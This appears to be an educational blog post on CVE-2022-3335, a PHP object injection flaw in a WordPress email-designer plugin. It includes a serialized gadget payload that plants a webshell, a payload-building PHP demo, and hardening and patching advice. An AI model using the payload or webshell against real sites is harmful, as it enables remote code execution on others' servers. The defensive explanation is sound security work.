WordPress powers a huge chunk of the Internet, and its plugin ecosystem is both a strength and a risk. In this long read, we explore CVE-2022-3335, a PHP Object Injection vulnerability in the Kadence WooCommerce Email Designer plugin (versions before 1.5.7) that can escalate to remote code execution. The bug comes into play during the import of design files, something that looks harmless but is risky once you know how serialized payloads work.
What Is CVE-2022-3335?
CVE-2022-3335 is a vulnerability discovered in the Kadence WooCommerce Email Designer plugin, where the plugin unserializes the content from imported files without properly checking or filtering it. This leaves the door open to PHP Object Injection attacks when a WordPress admin uploads a crafted (malicious) design file—intentionally or by trickery.
The real danger? If a suitable gadget chain exists in any of the plugins or themes installed, an attacker can execute arbitrary code on your server.
The Code: Where Things Go Wrong
Before version 1.5.7, when you click the “Import” button in Kadence WooCommerce Email Designer, the code will read the uploaded file and use unserialize() on its contents. Here’s an abstracted and simplified version (not the literal plugin code, but close for learning):
if(isset($_FILES['import_file'])) {
$file_content = file_get_contents($_FILES['import_file']['tmp_name']);
$data = unserialize($file_content); // <-- DANGER!
// ... proceed to use $data
}
What’s the problem?
unserialize() rebuilds whatever PHP data structures the file describes, including objects of any class that is already declared or can be autoloaded. A crafted file therefore lets the attacker instantiate classes the plugin never intended and have their "magic methods" run: __wakeup() and __unserialize() fire during unserialize() itself, and __destruct() fires when the object is freed. Chaining such methods across existing classes (a "gadget chain") turns data injection into code execution.
A safe way would be to use json_decode() on a JSON export (JSON cannot express PHP objects), or, if the serialized format must stay, to pass the allowed_classes option (set to false, available since PHP 7.0) to unserialize() so that no class is ever instantiated, and then to reject any __PHP_Incomplete_Class that comes back.
Step 1: Create a Malicious Export File
The attacker needs to trick an admin into importing a poisoned design file. The file contains a PHP serialized object; the minimal form (class-name length, class name, property count) looks like:
O:9:"Malicious":0:{}
But a real attack needs an object using gadgets from available libraries (e.g., a plugin or theme class with a __destruct or __wakeup method that calls eval(), file_put_contents(), etc.). The class must already be declared or autoloadable when unserialize() runs; an unknown class name only yields a harmless __PHP_Incomplete_Class.
Step 2: Trigger Execution
Upon import, PHP unserializes the malicious object. If a suitable gadget chain is present, arbitrary code (malware, webshells, user creation, etc.) can run.
Suppose your site has another plugin with this kind of destructor:
class VulnerableLogger {
public $logFile = '/tmp/myevil.php';
public $toWrite = '<?php system($_GET["cmd"]); ?>'; // webshell
function __destruct() {
file_put_contents($this->logFile, $this->toWrite);
}
}
The attacker's import file would be (every s:N length must match the byte count exactly; "/tmp/myevil.php" is 15 bytes, and a wrong length makes unserialize() fail before the gadget fires):
O:16:"VulnerableLogger":2:{s:7:"logFile";s:15:"/tmp/myevil.php";s:7:"toWrite";s:30:"<?php system($_GET["cmd"]); ?>";}
With this, simply importing the file as admin writes a shell to the server's disk. In a real attack the path would point somewhere reachable over HTTP (such as the uploads directory) rather than /tmp.
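The following is an added example written for this article, not the plugin's code and not from the original post. It wires the VulnerableLogger gadget above to the two import styles discussed under "What's the problem?": the pre-1.5.7 unserialize() call beside a hardened version that uses allowed_classes => false, plus a JSON-based import. buildPayload, vulnerableImport, hardenedImport, jsonImport and containsObject are hypothetical helper names, the target path is a temp file, and the "webshell" is replaced by a harmless marker string. It assumes PHP 8.0 or later (typed properties, mixed, JSON_THROW_ON_ERROR).

```php
<?php
// Added example for this article, not the plugin's own code. It recreates the
// CVE-2022-3335 pattern end to end with a hypothetical gadget class and a
// benign file write, then shows the hardened import beside the vulnerable one.
declare(strict_types=1);

// Hypothetical gadget: an unrelated class whose destructor writes
// attacker-controlled bytes to an attacker-controlled path.
class VulnerableLogger
{
    public string $logFile = '';
    public string $toWrite = '';

    public function __destruct()
    {
        if ($this->logFile !== '') {
            file_put_contents($this->logFile, $this->toWrite);
        }
    }
}

// Attacker side: build the serialized object by hand, computing each length
// with strlen() so the s:N prefixes are exact (a wrong length makes
// unserialize() fail and the gadget never fires).
function buildPayload(string $targetPath, string $contents): string
{
    $class = 'VulnerableLogger';
    $props = ['logFile' => $targetPath, 'toWrite' => $contents];
    $out = sprintf('O:%d:"%s":%d:{', strlen($class), $class, count($props));
    foreach ($props as $name => $value) {
        $out .= sprintf('s:%d:"%s";s:%d:"%s";', strlen($name), $name, strlen($value), $value);
    }
    return $out . '}';
}

// Pre-1.5.7 shape of the import: whatever class the file names gets built.
function vulnerableImport(string $fileContent): mixed
{
    return unserialize($fileContent);
}

// Recursively check a decoded value for objects. With allowed_classes => false
// every object becomes __PHP_Incomplete_Class; we refuse those outright too.
function containsObject(mixed $value): bool
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsObject($item)) {
                return true;
            }
        }
    }
    return false;
}

// Hardened import: no class may be instantiated, and objects are rejected.
function hardenedImport(string $fileContent): array
{
    $data = @unserialize($fileContent, ['allowed_classes' => false]);
    if (!is_array($data) || containsObject($data)) {
        throw new RuntimeException('import rejected: expected a plain array of settings');
    }
    return $data;
}

// JSON alternative: json_decode() with assoc=true can only produce arrays
// and scalars, so no PHP class is ever involved.
function jsonImport(string $fileContent): array
{
    $data = json_decode($fileContent, true, 32, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new RuntimeException('import rejected: expected a JSON object');
    }
    return $data;
}

// Demo. The target path and marker text are constructed for this example;
// a real payload would write a webshell under a web-reachable directory.
$target  = sys_get_temp_dir() . '/cve-2022-3335-demo.txt';
$payload = buildPayload($target, 'written by __destruct');
@unlink($target);
echo "payload: {$payload}\n";

$obj = vulnerableImport($payload);   // the gadget object is built here
unset($obj);                          // releasing it runs __destruct and writes the file
echo 'vulnerable import wrote file: ', var_export(file_exists($target), true), "\n";
@unlink($target);

try {
    hardenedImport($payload);         // object becomes __PHP_Incomplete_Class, no destructor
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
echo 'hardened import wrote file: ', var_export(file_exists($target), true), "\n";

// Constructed sample of what a JSON-based export could look like.
print_r(jsonImport('{"heading_color":"#333333","footer_text":"Thanks!"}'));
```

Run it with the PHP CLI (php demo.php). The point of the two import functions is the contrast: the same payload string causes a file write through vulnerableImport() and is simply refused by hardenedImport(), because allowed_classes => false never instantiates VulnerableLogger and so its destructor never exists to be triggered. Notice also that the hardening does not rely on recognising the class name; any object in the input is rejected, which is what you want for an import that should only ever carry settings.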
Real-World Risk
- Admins targeted: the bug can only be triggered by an account allowed to use the import feature, so the attacker must get an administrator to upload the poisoned file. Risk goes up wherever social engineering is likely.
- Plugin "gadget chain" needed: full code execution requires other plugin/theme classes with dangerous magic methods that are loaded at import time. Many large sites have them, even if unintentionally.
Fix Timeline
- October 10, 2022: Vulnerability publicly reported (WPScan Advisory)
- v1.5.7: Kadence released a patch (Changelog)
What To Do
1. Update Kadence WooCommerce Email Designer to v1.5.7 or later.
2. Audit your site for unknown users, webshells, and suspicious plugins.
3. Remove or block admin file imports, if possible, or restrict them to trusted users.
4. Disable unused plugins/themes; this shrinks the available gadget chains.
References and Further Reading
- WPScan Vulnerability Report: CVE-2022-3335
- Kadence’s official changelog
- PHP Object Injection Explained
- How to build (or find) a PHP gadget chain
Final Thoughts
CVE-2022-3335 highlights how easy it is for a single unsafe PHP function to unravel site security. Never import files you don’t fully trust, always keep your plugins updated, and remember—even admin actions can be exploited by clever attackers. Stay safe!
*Note: All code examples are for educational purposes only.*
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 01:41:00 UTC